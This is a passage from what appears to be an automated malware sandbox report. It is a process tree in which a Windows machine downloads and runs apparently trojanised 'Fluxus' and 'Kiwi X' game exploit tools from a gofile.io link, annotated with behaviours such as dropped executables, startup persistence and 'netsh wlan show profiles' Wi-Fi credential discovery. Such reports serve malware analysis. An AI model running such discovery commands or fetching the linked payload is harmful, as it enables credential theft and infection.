  2⤵
  PID:4276
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x4b4 0x518
  2⤵
  PID:2424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1952

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2252

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2404

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
- Modifies data under HKEY_USERS
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2992

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3380

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/MqvFWU
  2⤵
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd452846f8,0x7ffd45284708,0x7ffd45284718
    3⤵
    PID:1508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
    3⤵
    PID:408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
    3⤵
    PID:760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
    3⤵
    PID:4972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
    3⤵
    PID:2436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
    3⤵
    PID:5060
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
    3⤵
    PID:4536
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
    3⤵
    PID:3544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
    3⤵
    PID:2476
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
    3⤵
    PID:3972
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
    3⤵
    PID:4868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
    3⤵
    PID:3004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
    3⤵
    PID:2824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
    3⤵
    PID:5232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5832 /prefetch:8
    3⤵
    PID:5240
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
    3⤵
    PID:4492
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
    3⤵
    PID:4892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
    3⤵
    PID:6044
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3404 /prefetch:2
    3⤵
    PID:1908
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
    3⤵
    PID:5224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
    3⤵
    PID:4432
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6600 /prefetch:1
    3⤵
    PID:5248
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3440 /prefetch:8
    3⤵
    PID:5380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1932,12860713017850604498,9190978382835934127,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6680 /prefetch:8
    3⤵
    PID:2524
- - C:\Users\Admin\Downloads\FluxusInstaller.exe
    "C:\Users\Admin\Downloads\FluxusInstaller.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5972
  - - C:\Users\Admin\Downloads\terms.exe
      "C:\Users\Admin\Downloads\terms.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5772
  - - C:\Users\Admin\Downloads\fluxus.exe
      "C:\Users\Admin\Downloads\fluxus.exe"
      4⤵
      Executes dropped EXE
      PID:5160
    - - C:\Users\Admin\Downloads\fluxus.exe
        
        "C:\Users\Admin\Downloads\fluxus.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5632
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1928
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1644
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap13226:92:7zEvent11481
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:5828
- C:\Users\Admin\Downloads\Kiwi X External.exe
  "C:\Users\Admin\Downloads\Kiwi X External.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3112
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Kiwi X External\" -spe -an -ai#7zMap7489:92:7zEvent31690
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:5684
- C:\Users\Admin\Downloads\Kiwi X External\Kiwi X External.exe
  "C:\Users\Admin\Downloads\Kiwi X External\Kiwi X External.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5920
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Drops startup file
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1760
- C:\Users\Admin\Downloads\Kiwi X External\Kiwi X External.exe
  "C:\Users\Admin\Downloads\Kiwi X External\Kiwi X External.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6056
- C:\Users\Admin\Downloads\Kiwi X External\Kiwi X External.exe
  "C:\Users\Admin\Downloads\Kiwi X External\Kiwi X External.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3320
- C:\Users\Admin\Downloads\fluxus.exe
  "C:\Users\Admin\Downloads\fluxus.exe"
  2⤵
  - Executes dropped EXE
  PID:4760
- - C:\Users\Admin\Downloads\fluxus.exe
    "C:\Users\Admin\Downloads\fluxus.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4720
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2924
- C:\Users\Admin\Downloads\terms.exe
  "C:\Users\Admin\Downloads\terms.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:4656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd35e446f8,0x7ffd35e44708,0x7ffd35e44718
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:1928
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
    3⤵
    PID:6096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
    3⤵
    PID:6008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
    3⤵
    PID:5920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
    3⤵
    PID:5724
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
    3⤵
    PID:6020
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
    3⤵
    PID:5640
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
    3⤵
    PID:1008
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8
    3⤵
    PID:5256
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8
    3⤵
    PID:4688
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
    3⤵
    PID:4580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
    3⤵
    PID:4568
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
    3⤵
    PID:3596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
    3⤵
    PID:4092
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
    3⤵
    PID:1668
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4948 /prefetch:8
    3⤵
    PID:2188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
    3⤵
    PID:3152
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,6372618410282128463,5213381916499415754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
    3⤵
    PID:2732
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
